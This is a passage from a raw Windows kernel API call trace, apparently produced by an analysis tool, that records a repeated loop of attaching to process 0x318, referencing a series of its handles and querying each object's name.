PsAcquireProcessExitSynchronization () returned 0x0 [0289.793] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.793] ObReferenceObjectByHandle (in: Handle=0x410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698c0ad0, HandleInformation=0x0) returned 0x0 [0289.793] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.793] PsReleaseProcessExitSynchronization () returned 0x2 [0289.793] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d8 [0289.793] ObQueryNameString (in: Object=0xffffe000698c0ad0, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.793] ObfDereferenceObject (Object=0xffffe000698c0ad0) returned 0x7ffd [0289.793] IoCompleteRequest () returned 0x0 [0289.793] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.793] PsAcquireProcessExitSynchronization () returned 0x0 [0289.793] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.793] ObReferenceObjectByHandle (in: Handle=0x414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698c0960, HandleInformation=0x0) returned 0x0 [0289.793] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.794] PsReleaseProcessExitSynchronization () returned 0x2 [0289.794] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d7 [0289.794] ObQueryNameString (in: Object=0xffffe000698c0960, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.794] ObfDereferenceObject (Object=0xffffe000698c0960) returned 0x7ffd [0289.794] IoCompleteRequest () returned 0x0 [0289.794] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.794] PsAcquireProcessExitSynchronization () returned 0x0 [0289.794] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.794] ObReferenceObjectByHandle (in: Handle=0x518, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696b2f20, HandleInformation=0x0) returned 0x0 [0289.794] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.794] PsReleaseProcessExitSynchronization () returned 0x2 [0289.794] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d6 [0289.794] ObQueryNameString (in: Object=0xffffe000696b2f20, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.794] ObfDereferenceObject (Object=0xffffe000696b2f20) returned 0x7ff2 [0289.794] IoCompleteRequest () returned 0x0 [0289.794] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.794] PsAcquireProcessExitSynchronization () returned 0x0 [0289.794] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.794] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693dd570, HandleInformation=0x0) returned 0x0 [0289.794] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.794] PsReleaseProcessExitSynchronization () returned 0x2 [0289.794] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d5 [0289.794] ObQueryNameString (in: Object=0xffffe000693dd570, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.794] ObfDereferenceObject (Object=0xffffe000693dd570) returned 0x7ff4 [0289.794] IoCompleteRequest () returned 0x0 [0289.794] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.794] PsAcquireProcessExitSynchronization () returned 0x0 [0289.794] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.794] ObReferenceObjectByHandle (in: Handle=0x524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698cac60, HandleInformation=0x0) returned 0x0 [0289.794] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.794] PsReleaseProcessExitSynchronization () returned 0x2 [0289.794] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d4 [0289.794] ObQueryNameString (in: Object=0xffffe000698cac60, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.794] ObfDereferenceObject (Object=0xffffe000698cac60) returned 0x7ffd [0289.794] IoCompleteRequest () returned 0x0 [0289.794] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.794] PsAcquireProcessExitSynchronization () returned 0x0 [0289.794] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.794] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698cef20, HandleInformation=0x0) returned 0x0 [0289.794] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.794] PsReleaseProcessExitSynchronization () returned 0x2 [0289.794] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d3 [0289.794] ObQueryNameString (in: Object=0xffffe000698cef20, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.794] ObfDereferenceObject (Object=0xffffe000698cef20) returned 0x7ffd [0289.794] IoCompleteRequest () returned 0x0 [0289.795] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.795] PsAcquireProcessExitSynchronization () returned 0x0 [0289.795] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.795] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d1450, HandleInformation=0x0) returned 0x0 [0289.795] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.795] PsReleaseProcessExitSynchronization () returned 0x2 [0289.795] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d2 [0289.795] ObQueryNameString (in: Object=0xffffe000698d1450, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.795] ObfDereferenceObject (Object=0xffffe000698d1450) returned 0x7ffd [0289.795] IoCompleteRequest () returned 0x0 [0289.795] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.795] PsAcquireProcessExitSynchronization () returned 0x0 [0289.795] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.795] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698fb940, HandleInformation=0x0) returned 0x0 [0289.795] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.795] PsReleaseProcessExitSynchronization () returned 0x2 [0289.795] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d1 [0289.795] ObQueryNameString (in: Object=0xffffe000698fb940, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.795] ObfDereferenceObject (Object=0xffffe000698fb940) returned 0x800e [0289.795] IoCompleteRequest () returned 0x0 [0289.795] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.795] PsAcquireProcessExitSynchronization () returned 0x0 [0289.795] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.795] ObReferenceObjectByHandle (in: Handle=0x620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698eec30, HandleInformation=0x0) returned 0x0 [0289.795] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.795] PsReleaseProcessExitSynchronization () returned 0x2 [0289.795] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d0 [0289.795] ObQueryNameString (in: Object=0xffffe000698eec30, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.795] ObfDereferenceObject (Object=0xffffe000698eec30) returned 0x800d [0289.795] IoCompleteRequest () returned 0x0 [0289.795] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.795] PsAcquireProcessExitSynchronization () returned 0x0 [0289.795] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.795] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069749850, HandleInformation=0x0) returned 0x0 [0289.795] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.795] PsReleaseProcessExitSynchronization () returned 0x2 [0289.795] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801cf [0289.795] ObQueryNameString (in: Object=0xffffe00069749850, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.795] ObfDereferenceObject (Object=0xffffe00069749850) returned 0x7ffb [0289.795] IoCompleteRequest () returned 0x0 [0289.795] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.795] PsAcquireProcessExitSynchronization () returned 0x0 [0289.795] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.795] ObReferenceObjectByHandle (in: Handle=0x62c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069920f20, HandleInformation=0x0) returned 0x0 [0289.795] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.796] PsReleaseProcessExitSynchronization () returned 0x2 [0289.796] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ce [0289.796] ObQueryNameString (in: Object=0xffffe00069920f20, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.796] ObfDereferenceObject (Object=0xffffe00069920f20) returned 0x7e78 [0289.796] IoCompleteRequest () returned 0x0 [0289.796] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.796] PsAcquireProcessExitSynchronization () returned 0x0 [0289.796] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.796] ObReferenceObjectByHandle (in: Handle=0x664, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996bde0, HandleInformation=0x0) returned 0x0 [0289.796] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.796] PsReleaseProcessExitSynchronization () returned 0x2 [0289.796] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801cd [0289.796] ObQueryNameString (in: Object=0xffffe0006996bde0, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.796] ObfDereferenceObject (Object=0xffffe0006996bde0) returned 0x7ffe [0289.796] IoCompleteRequest () returned 0x0 [0289.796] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.796] PsAcquireProcessExitSynchronization () returned 0x0 [0289.796] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.796] ObReferenceObjectByHandle (in: Handle=0x668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069924b10, HandleInformation=0x0) returned 0x0 [0289.796] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.796] PsReleaseProcessExitSynchronization () returned 0x2 [0289.796] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801cc [0289.796] ObQueryNameString (in: Object=0xffffe00069924b10, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.796] ObfDereferenceObject (Object=0xffffe00069924b10) returned 0x7feb [0289.796] IoCompleteRequest () returned 0x0 [0289.796] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.796] PsAcquireProcessExitSynchronization () returned 0x0 [0289.796] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.796] ObReferenceObjectByHandle (in: Handle=0x66c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a5600, HandleInformation=0x0) returned 0x0 [0289.796] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.796] PsReleaseProcessExitSynchronization () returned 0x2 [0289.796] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801cb [0289.796] ObQueryNameString (in: Object=0xffffe000699a5600, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.796] ObfDereferenceObject (Object=0xffffe000699a5600) returned 0x7ffc [0289.796] IoCompleteRequest () returned 0x0 [0289.796] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.796] PsAcquireProcessExitSynchronization () returned 0x0 [0289.796] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.796] ObReferenceObjectByHandle (in: Handle=0x684, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996bc70, HandleInformation=0x0) returned 0x0 [0289.796] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.796] PsReleaseProcessExitSynchronization () returned 0x2 [0289.796] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ca [0289.796] ObQueryNameString (in: Object=0xffffe0006996bc70, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.796] ObfDereferenceObject (Object=0xffffe0006996bc70) returned 0x7ffc [0289.797] IoCompleteRequest () returned 0x0 [0289.797] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.797] PsAcquireProcessExitSynchronization () returned 0x0 [0289.797] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.797] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996d500, HandleInformation=0x0) returned 0x0 [0289.797] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.797] PsReleaseProcessExitSynchronization () returned 0x2 [0289.797] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c9 [0289.797] ObQueryNameString (in: Object=0xffffe0006996d500, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.797] ObfDereferenceObject (Object=0xffffe0006996d500) returned 0x7ffa [0289.797] IoCompleteRequest () returned 0x0 [0289.797] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.797] PsAcquireProcessExitSynchronization () returned 0x0 [0289.797] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.797] ObReferenceObjectByHandle (in: Handle=0x6a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996da20, HandleInformation=0x0) returned 0x0 [0289.797] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.797] PsReleaseProcessExitSynchronization () returned 0x2 [0289.797] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c8 [0289.797] ObQueryNameString (in: Object=0xffffe0006996da20, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.797] ObfDereferenceObject (Object=0xffffe0006996da20) returned 0x7ffc [0289.797] IoCompleteRequest () returned 0x0 [0289.797] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.797] PsAcquireProcessExitSynchronization () returned 0x0 [0289.797] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.797] ObReferenceObjectByHandle (in: Handle=0x6ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996ef20, HandleInformation=0x0) returned 0x0 [0289.797] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.797] PsReleaseProcessExitSynchronization () returned 0x2 [0289.797] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c7 [0289.797] ObQueryNameString (in: Object=0xffffe0006996ef20, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.797] ObfDereferenceObject (Object=0xffffe0006996ef20) returned 0x7ffc [0289.797] IoCompleteRequest () returned 0x0 [0289.797] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.797] PsAcquireProcessExitSynchronization () returned 0x0 [0289.797] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.797] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996ea00, HandleInformation=0x0) returned 0x0 [0289.797] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.797] PsReleaseProcessExitSynchronization () returned 0x2 [0289.797] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c6 [0289.797] ObQueryNameString (in: Object=0xffffe0006996ea00, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.797] ObfDereferenceObject (Object=0xffffe0006996ea00) returned 0x7ffc [0289.797] IoCompleteRequest () returned 0x0 [0289.797] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.797] PsAcquireProcessExitSynchronization () returned 0x0 [0289.797] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.798] ObReferenceObjectByHandle (in: Handle=0x6b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996e4e0, HandleInformation=0x0) returned 0x0 [0289.798] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.798] PsReleaseProcessExitSynchronization () returned 0x2 [0289.798] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c5 [0289.798] ObQueryNameString (in: Object=0xffffe0006996e4e0, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.798] ObfDereferenceObject (Object=0xffffe0006996e4e0) returned 0x7ffa [0289.798] IoCompleteRequest () returned 0x0 [0289.798] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.798] PsAcquireProcessExitSynchronization () returned 0x0 [0289.798] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.798] ObReferenceObjectByHandle (in: Handle=0x6b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996ff20, HandleInformation=0x0) returned 0x0 [0289.798] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.798] PsReleaseProcessExitSynchronization () returned 0x2 [0289.798] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c4 [0289.798] ObQueryNameString (in: Object=0xffffe0006996ff20, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.798] ObfDereferenceObject (Object=0xffffe0006996ff20) returned 0x7ffa [0289.798] IoCompleteRequest () returned 0x0 [0289.798] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.798] PsAcquireProcessExitSynchronization () returned 0x0 [0289.798] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.798] ObReferenceObjectByHandle (in: Handle=0x6bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996fa00, HandleInformation=0x0) returned 0x0 [0289.798] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.798] PsReleaseProcessExitSynchronization () returned 0x2 [0289.798] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c3 [0289.798] ObQueryNameString (in: Object=0xffffe0006996fa00, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.798] ObfDereferenceObject (Object=0xffffe0006996fa00) returned 0x7ffc [0289.798] IoCompleteRequest () returned 0x0 [0289.798] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.798] PsAcquireProcessExitSynchronization () returned 0x0 [0289.798] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.798] ObReferenceObjectByHandle (in: Handle=0x6c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996f4e0, HandleInformation=0x0) returned 0x0 [0289.798] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.798] PsReleaseProcessExitSynchronization () returned 0x2 [0289.798] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801c2 [0289.798] ObQueryNameString (in: Object=0xffffe0006996f4e0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.798] ObfDereferenceObject (Object=0xffffe0006996f4e0) returned 0x7ffa [0289.798] IoCompleteRequest () returned 0x0 [0289.798] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.798] PsAcquireProcessExitSynchronization () returned 0x0 [0289.798] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.798] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006999dc40, HandleInformation=0x0) returned 0x0 [0289.798] KeUnstackDetachProcess 